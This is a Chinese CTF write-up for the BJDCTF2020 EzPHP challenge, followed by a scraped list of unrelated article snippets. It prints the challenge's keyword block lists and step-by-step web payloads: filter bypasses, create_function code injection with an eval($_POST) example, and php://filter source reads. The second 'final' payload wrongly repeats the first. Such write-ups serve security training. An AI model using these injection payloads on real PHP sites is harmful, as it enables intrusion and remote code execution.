冯·诺依曼
冯·诺依曼

[BJDCTF2020]EzPHP之preg_match绕过

打开链接之后发现页面为:
[BJDCTF2020]EzPHP之preg_match绕过_第1张图片
右击查看不了源码,按F12查看源码得到
[BJDCTF2020]EzPHP之preg_match绕过_第2张图片
GFXEIM3YFZYGQ4A= 使用base64,base32与base16一个一个试,得知是base32,解密之后为:1nD3x.php,之后在url上输入查看得到代码:

  <?php
highlight_file(__FILE__);
error_reporting(0); 

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
";

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!
";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?
");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?
";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("
Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>

第一步:

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

需要绕过$_SERVER['QUERY_STRING']的过滤,因为$_SERVER['QUERY_STRING']不会对url解码进行,$_GET会进行url解码,故可以用urlecode进行编码绕过
第二步:

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!
";
    } 
} else die('fxck you! What do you want to do ?!');

过滤了https与http,但是使用的是preg_match(’/^$/’),我们可以用用换行符%0a绕过,payload为:

debu=aqua_is_cute%0a

第三步:

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
}

$_REQUEST绕过,$_REQUEST在同时接收GET和POST参数时,POST优先级更高,先接受post参数。
故构造post传参:

第四步:

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?
");

可以使用data或者php://input进行绕过;

file=data://text/plain,debu_debu_aqua,后面部分进行url编码的:
file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

第五步:

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?
";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

sha1函数对数组返回为false,故可以构造数组绕过:payload为:

shana[]=12&passwd[]=56

第六步(重点)

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("
Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>

$code$arg可控,利用$code('',$arg)进行create_function注入
function a('',$arg){
    return $arg
}
例子:
但是如果第二个参数没有限制的话,如$code=return $a+$b;}eval($_POST['cmd']);//,就变成

function myfunc($a, $b){
	return $a+$b;
}
eval($_POST['cmd']);//}

<?php
$myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST["a"]);\\')
实际上为:
function myFunc($a, $b)
{ return $a+$b; } 
eval($_POST['a']);//}

利用取反绕过+伪协议读源码

构造flag[code]=create_function&flag[arg]=}var_dump(get_defined_vars());//查看所有变量,注意这里的code,flag,arg需要进行url编码。
最终payload为:

http://44416704-ec7d-4081-81fe-ce665b3a450a.node4.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function

post部分为:
debu=1&file=1

[BJDCTF2020]EzPHP之preg_match绕过_第3张图片
出现上图所示,看到flag在rea1fl4g.php之中,利用取反代码

$a = "php://filter/read=convert.base64-encode/resource=rea1fl4g.php";
$arr1 = explode(' ', $a);
echo "
~(";
foreach ($arr1 as $key => $value) {
	echo "%".bin2hex(~$value);
}
echo ")
";

得到

~(%8f978fc5d0d09996938b9a8dd08d9a9e9bc29c9091899a8d8bd19d9e8c9ac9cbd29a919c909b9ad08d9a8c908a8d9c9ac28d9a9ece9993cb98d18f978f)
经过处理之后为:
~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f)

把var_dump(get_defined_vars())替换为require()最终payload为:

http://44416704-ec7d-4081-81fe-ce665b3a450a.node4.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function

post传参部分为
debu=1&file=1

得到base64编码
在这里插入图片描述
解密得到flag
另一种解法用异或这里没有实现。

你可能感兴趣的:([BJDCTF2020]EzPHP之preg_match绕过)

  • 复活 杖剑走四方
    我没有准备来不及准备棉祆手套皮靴还有一切御寒的物件……冬冰冷之刀已架在脖子上有人喊刀下留人一条围巾横空飞来我在瞬间复活
  • shell循环结构之for循环 虎皮辣椒小怪兽 Linux服务器linux运维
    文章目录一、for循环语法二、例子一、for循环语法1、for((i=1;i/dev/nullif[$?-eq0];thenecho"$ip.$iisok">>/tmp/ip_up.txtelseecho"$ip.$iisdown">>/tmp/ip_down.txtfi}&donewait
  • unity学习之 编辑器拓展 20190722 那年白马啸西风 unity编辑器拓展笔记
    https://www.xuanyusong.com/archives/category/unity/unity3deditor-师傅给的教程总体来说,这个教程还是挺好的,说的很全面,但是这个教程使用的unity版本有点旧,而且有些实例是要用unity,所以只做了一半实例,,也因为要赶工作,所以就不一一做完了序号题目功能简述完成度完成度等级划分各部分划分描述数量1拓展的面板视图OnInspecto
  • 把时间当作朋友之十二 zhujiang0718
    继续读《把时间当作朋友》,上次读完第5章的第4-5节。回顾:第4节,相关命题:原命题为真,它的逆命题不一定为真。但在实际生活中有许多人会把原命题和它的逆命题等同起来。而且约有70%以上的人分不清楚原命题与逆命题的区别。混淆原命题和逆命题,抹杀两者之间的差别,是广告设计者最常用、最舍不得放弃的手段——因为它很有效,正如之前的统计数据,至少对70%的人有效。第5节,举证责任:谁主张,谁举证,不仅是一个
  • 《华为云服务器:助力《幻兽帕鲁》畅爽体验》 单车~ 华为云服务器运维
    在当今丰富多彩的游戏世界中,一款优秀的游戏如同璀璨的星辰,吸引着无数玩家沉浸其中。而《幻兽帕鲁》便是这样一颗耀眼的明星,它以其独特的玩法、精美的画面和丰富的剧情,迅速在游戏市场中占据了一席之地。然而,一款成功的游戏背后,离不开强大的服务器支持。华为云服务器,以其卓越的性能、先进的技术和可靠的服务,成为了《幻兽帕鲁》的理想之选,为玩家们开启了一段令人难忘的游戏之旅。华为云服务器的卓越性能,是《幻兽帕
  • 荣耀的勋章 FE各代的骑士 OliverWorlds
    OliverWorldsFile078“忠诚、荣耀、勇气、信仰”象征着骑士精神的词语,也代表了骑士的信念。骑士,就是光明公正的象征,他们强大而又正义,是人民的希望,是人民最好的朋友。“放心吧,希妲,这里有阿利提亚勇敢的骑士们,是不会输给海盗的,来吧,我们一起向城堡进发吧!”选自《火炎之纹章暗黑龙与光之剑》作为一部以中世纪剑与魔法世界为背景的游戏,《火炎之纹章》无疑是成功的,剑与魔法的世界,魔法是指
  • 热闹非凡的清晨成就自我成长 小妮儿的简生活
    不按常理出牌的清晨昨晚初步完成陪伴营“小家变大”的作业后,时间已是今天。今早5点40醒来后小睡,6点准时起床。烧水,为爸爸准备早餐,刚回到卧室看了几分钟的《一念之转》,发现需要更多实践练习。突然想到了《走出剧情》,看了会儿,尽管看的不多,但进入了内心深处。正感慨之际,加加需要喂奶接觉,而安安这时也已醒来。本该醒来起床的爸爸,坐起来接着睡,这本领一般人比不了。醒来的安安叫着加加,加加从半睡半醒直接切
  • 台湾行之day2 vinnielor
    day2行程:台北市,台北故宫博物馆——士林府邸——台北101今天的行程主要是台北市的景点。台北故宫博物馆有中华文化宝库之誉,馆内的藏品确实令人大开眼界(据说馆内藏品有69万件,虽然数量不及北京故宫博物馆,但馆内的藏品均是精致品)。馆内共有三层,最上层主要展示镇馆三宝和各种古代的石器制品;第二层为官员用品;最下层为皇室专用品。其中镇馆三宝分别是:毛公鼎、翠玉白菜、肉形石。(馆内游客太多,想拍好照片
  • 共读《论语》的第九天 iris方虹
    第十六篇(季氏篇)的第6章:子曰:“侍于君子有三愆(qiān);言未及之而言谓之躁,言及之而不言谓之隐,未见颜色而言谓之瞽(gǔ)。”【翻译】孔子说:“侍奉君子容易有三种过失:没有轮到他发言而发言,叫作急躁;到该说话时却不说话,叫作隐瞒;不看君子的脸色而贸然说话,叫作盲目。”这里罗列了我们在和别人沟通的时候三个要注意的点:不可急躁,没到自己该说的时候不要急着说;不可隐瞒,应该自己发言的时候不发言;
  • 會意讀書——讀通札記(815) 趙國龍淼
    讀文白對照本《卷八十一》,感:1、會意讀書。人言:萬般皆下品,惟有讀書高;再言:世間數百年舊家無非積德,天下第一等好事還是讀書;更言:寧可居無竹,食無肉,不可不讀書;一日不讀書,便覺面目可憎!竊以為是,縱使穿越千年,時代變遷;滄海桑田,物是人非;好讀書,讀好書,讀書好,讀書快樂,萬年不變!何也?讀好書,是站在巨人的肩膀上,開闊眼界;是拜讀千年之帝王將相,人傑精英,增長才智;是和史詩級大師,諸子百家
  • 欧几里得拓展算法之RSA加密算法的Java实现 弱即弱离 算法javajava算法开发语言
    1.算法简介RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据的加密和解密。它依赖于一个大素数的因数分解问题,即将一个非常大的数字分解为两个较小的质数。RSA算法由三个主要步骤组成:密钥生成、加密和解密。2.基本原理RSA算法的基本原理是利用质数因子分解的困难性实现加解密过程。具体而言,密钥生成包括选择两个大素数p和q,计算N=p*q,并选择公钥e,其中10){E
  • java的专题之数组和集合类——map介绍 少帅yangjie
    map用来存储键值对,值可以重复,但是键不能重复,如果put相同键的值,会完成覆盖map的遍历要先将key转换为set,之后通过遍历set通过get(key)的方法来得到值相关例子:具体代码和输出结果
  • 公子 悠悠猫儿
    公子,可还记得,当年大明湖畔的容儿吗那年,公子白衣胜雪,青丝如墨眼眸干净的宛如星辰神情温柔,恰似一方美玉容儿蒲柳之姿得遇公子,三生之幸也,此生亦无悔惟怨造化弄人,时事变迁公子,可还记得当年大明湖畔的容儿吗你的一词一句,温柔一笑容儿,为你牵挂了一生
  • 23种设计模式之11种行为型模式 如意如意525 设计模式java
    11种行为型设计模式行为型设计模式用于处理对象之间的职责、责任和算法的分配。以下是一些常见的行为型设计模式:策略模式(StrategyPattern):定义一系列算法,将它们封装成独立的策略类,使得它们可以互相替换而不影响客户端。观察者模式(ObserverPattern):定义一种一对多的依赖关系,使得当一个对象的状态发生改变时,所有依赖于它的对象都会得到通知和自动更新。模板方法模式(Templ
  • [追凌]执此一朵放心上 星星糖01
    没有文笔的挣扎假装没有oocQAQ天空一片阴沉,灰色的乌云翻腾着,肆虐着,越滚越浓,仿佛要吞没了天际,这景象映在思追的眸子里,掩住了几分原本晶亮的神采,修长的睫毛微微下垂,脑海中的画面在一刹那与眼前之景重合……他不记得那是什么时候的事了,亦或是那只是一场奇怪的梦,周遭是潮湿而阴冷的泥土,四面无边的漆黑,时而闪过几道刺目的剑光,伴随着的是凄惨的叫声,一道白色的霹雳划破苍穹,像是城门被攻开了一般,一切
  • 【10000之135天】高票通过的秘诀,永远要站在对方来思考问题 明月书心堂
    【10000之135天】高票通过的秘诀,永远要站在对方来思考问题于晓准备召开一次董事大会,她要在这个会上让几个核心部门表态认可她的方案。原计划用三个月的时间来筹备这个会议,因为有其他的任务,于晓提前了董事会的召开时间。在召开董事会的前一天,她召集智囊团会议,让大家对这次会议的结果做一个预判评分,智囊团认为,本次会议的准备时间太短,方案中的几项改革涉及到几个核心部门的利益,如果站在各自的利益角度来看
  • R7RS标准之重要特性及用法实例(三十九) Android系统攻城狮 R7RS标准重要特性
    简介:CSDN博客专家,专注Android/Linux系统,分享多mic语音方案、音视频、编解码等技术,与大家一起成长!新书发布:《Android系统多媒体进阶实战》优质专栏:Audio工程师进阶系列【原创干货持续更新中……】优质专栏:多媒体系统工程师系列【原创干货持续更新中……】优质视频课程:AAOS车载系统+AOSP14系统攻城狮入门视频实战课人生格言:人生从来没有捷径,只有行动才是治疗恐惧和
  • 三国杀之西游杀(二) opcc
    游戏是幻想与现实之间的桥梁。游戏是一种基于物质需求满足之上的,在一种特定时间、空间范围内遵循某种特定规则的,追求精神需求满足的社会行为活动。游戏有智力游戏和活动性游戏之分,前者如下棋、积木、打牌等,后者如追逐、接力及利用球、棒、绳等器材进行的活动,多为集体活动,并有情节和规则,具有竞赛性。游戏定义1、柏拉图的游戏定义:游戏是一切幼子(动物的和人的)生活和能力跳跃需要而产生的有意识的模拟活动。2、亚
  • Java笔试面试题AI答之集合(5) 工程师老罗 Java笔试面试题AI答java开发语言
    文章目录25.简述HashMap和HashTable有何不同?26.ArrayList和Vector有何异同点?相同点不同点27.Array和ArrayList有何区别?什么时候更适合用Array?主要区别何时更适合使用Array总结28.解释Java并发集合类是什么?29.简述Vector,ArrayList,LinkedList的区别?1.底层实现2.性能3.线程安全4.扩容机制5.构造方法3
  • Java笔试面试题AI答之线程(4) 工程师老罗 Java笔试面试题AI答java开发语言
    文章目录19.Java编写多线程程序的时候你会遵循哪些最佳实践?1.使用线程池2.使用Callable和Future3.保证变量可见性4.保证线程安全5.避免死锁6.安全地终止线程7.使用并发容器8.使用ThreadLocal避免共享变量9.合理使用原子类10.编写可测试的代码20.解释在多线程环境下,SimpleDateFormat是线程安全的吗?21.说明哪些Java集合类是线程安全的?22.
  • Java笔试面试题AI答之集合(4) 工程师老罗 Java笔试面试题AI答java开发语言
    文章目录19.简述Java集合框架机制与原理?1.集合框架的组成2.核心接口3.集合框架的原理3.1底层数据结构3.2操作原理4.集合框架的优势20.简述集合框架中的泛型有什么作用和优点?作用优点21.Java集合框架的基础接口有哪些?22.解释Collection不从Cloneable和Serializable接口继承?1.设计的灵活性2.接口的通用性3.实际的实现方式结论23.解释为何Map接
  • 《黑神话·悟空》是用什么编程语言开发的? AI觉醒实战营
    《黑神话·悟空》:一场技术与文化的华丽碰撞最近,《黑神话·悟空》这款游戏可谓是火得一塌糊涂。作为被誉为中国第一款3A制作的单机游戏,它凭借惊艳的画面、流畅的战斗体验和深厚的文化内涵,不仅圈粉无数,连央视都为之点赞。但在这场视觉盛宴背后,有一个问题却鲜少被人关注:这款游戏到底是用什么编程语言开发的?“技术宅们,准备好开始一场编程语言的探秘之旅了吗?”揭秘游戏背后的技术内核根据游戏科学官网的信息,《黑
  • 红楼梦5 一米阳光的休闲小屋
    第五回游幻境指迷十二钗饮仙醪曲演红楼梦便是宝玉和黛玉二人之亲密友爱,亦自较别个不同,日则同行同坐,夜则同息同止,真是言和意顺,略无参商。参商拼音:[shēnshāng]解释:参和商都是二十八宿之一,两者不同时在天空中出现,比喻亲友不能会面,也比喻感情不和睦:~之阔。兄弟~。参、商二星此起彼落,不会同时出现在天空,因比喻人无法相见或不和睦:隔如参商。悒郁不忿yìyùbùfèn心中有气,压抑著不表现出
  • 中国共产党行唐县教师进修学校支部委员会打造书香型进修学校,争做“学习型”教师队伍建设正式启动 xichaoyang
    最是一年春好处,正是读书好时节”,在这春风和畅、绿草如茵、繁花锦绣、柳色含烟的大美春天,我们举行行唐县教师进修学校阅读暨学习型教师建设启动仪式。2023年3月22号,我支部邀请到了局党组成员严军祥莅临指导,严军祥指出,作为教师,只有不断学习和持续精进,才能领悟到教育智慧的真谛。作为“师之师”,更要具备顺应时代发展形势的意识与能力,时刻走在广大教师的前面,让自己真正成为一名新时代的“大先生”。为推进
  • HTML速写之Emmet语法规则 硅谷干货
    缩写语法Emmet使用类似于CSS选择器的语法来描述元素的结构与属性。嵌套操作符>(子元素)可以使用>运算符将元素嵌套在彼此内部较准确的含义是:使用**>**运算符,您将下降生成的树,所有兄弟元素的位置将根据最深的元素解析div>ul>li表现为:+(兄弟元素)使用+运算符将元素以相同层级放在同一父元素上div+p+bq表现为:^返回上层使用^运算符,您可以爬上树的一个层次,并更改上下文div+d
  • 【713】幼儿园亲子阅读之《那一天,我失去了超能力》 登登一君
    我是昭君,我想记录我生活工作的点点滴滴,今天是我每日一篇文章的第713天。您的孩子是不是有过让人头疼的时候,把家里弄得乱七八糟,还会做一些看起来很危险的超能力表演?家长是应该严厉制止他们,还是用爱和包容来陪伴她们探索这个世界呢?这本《那一天,我失去了超能力》讲出了孩子的心声。主人公妈妈的做法也很有启发性,让我们一起来看看。这是一本非常朴实的魔法绘本。书的封面上有一个小女孩儿,红衣服,黑斗篷,还戴着
  • 好春光——2018年3月14日 王姑娘_719e
    图片发自App今日鸟欢快,窗外花盛开,阳光明媚,微风习习,好一派大好春光!光影变幻,岁月匆匆,时间永远只会往前走,它从不纠结从不停留。四季的变换让人如此的安然而又不安。暖风和煦,春花开了,我们的人生又走到哪一步了呢?树影婆娑,黑白色块在交汇;枝条横斜,天生一段自然之美。大自然总是这么神奇,怪不得古往今来文人墨客无论喜悲,总是流连山水。的确,在大自然面前我们的那点点得失喜悲又算得了什么呢!想到这几天
  • C++从入门到起飞之——vector模拟实现 全方位剖析! 秋风起,再归来~ C++从入门到起飞c++
    个人主页:秋风起,再归来~系列专栏:C++从入门到起飞克心守己,律己则安目录1、vector的成员变量2、迭代器3、size与capacity4、[]运算符重载5、reserve6、push_back7、empty8、pop_back9、resize10、swap11、insert12、erase13、构造函数系列14、clear与赋值运算符重载15、析构函数16、vector类模版的打印函数17
  • 玄幻小说 《圣爱》 第七十二章 黑暗之灵(上) 碧海潮生2019
    作者:极天圣洺欢迎转载!转载注明“作者:极天圣洺”即可。图片发自App圣爱第一部跨世之恋第七十二章黑暗之灵(上)有诗为证:“自古多情伤别离!那堪冷落清秋节!无边飒飒风吹落叶,潇潇雨歇惊起心头,柔带情殇!”正文这是一个巨大的骷髅头!泛着黝黑的气息,八个巨大的窟窿,黑气穿梭。几百公里大,一伸一缩,好似呼吸!煞气、混乱、残暴的气息,处处弥漫!骷髅头的正中心,一点灵光若隐若现,似消失般,挣扎其内!无名身后
  • 婚姻法之同居关系 ——男女同居产生纠纷,如何解决? 一帆风正
    男女同居产生纠纷,如何解决?一、同居与结婚的区别一般来说,男女同居,是指两个相爱的异性暂时居住在一起,共同生活。除了性生活,还有搭伙过日子、相互扶持的内涵。除了生理上的追求,精神上的需求必不可少。同居是不被法律承认的一种行为,可以随时出于当事人的意愿而终止关系,同居各方都没有任何法律保障。区别同居和结婚,主要是看有没有具备法定形式。没有法定的仪式,或者到法定的机构登记取得证书,不算结婚。二、对于同
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
    转载请出自出处:http://eksliang.iteye.com/blog/2097999   SQL语句的优化总结如下   sql语句的优化可以按照如下六个步骤进行: 合理使用索引 避免或者简化排序 消除对大表的扫描 避免复杂的通配符匹配 调整子查询的性能 EXISTS和IN运算符 下面我就按照上面这六个步骤分别进行总结:
  • 浅析:Android 嵌套滑动机制(NestedScrolling) gg163 android移动开发滑动机制嵌套
    谷歌在发布安卓 Lollipop版本之后,为了更好的用户体验,Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢?<!--[if !supportLineBreakNewLine]--><!--[endif]--> 比如你使用了Toolbar,下面一个ScrollView,向上滚
  • 使用hovertree菜单作为后台导航 hvt JavaScriptjquery.nethovertreeasp.net
      hovertree是一个jquery菜单插件,官方网址:http://keleyi.com/jq/hovertree/ ,可以登录该网址体验效果。 0.1.3版本:http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件: http://keleyi.com/jq/hovertree/css
  • SVG 教程 (二)矩形 天梯梦 svg
    SVG <rect> SVG Shapes SVG有一些预定义的形状元素,可被开发者使用和操作: 矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
  • 一个简单的队列 luyulong java数据结构队列
    public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
  • 基础数据结构和算法九:Binary Search Tree sunwinner Algorithm
      A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
  • 项目出现的一些问题和体会 Steven-Walker DAOWebservlet
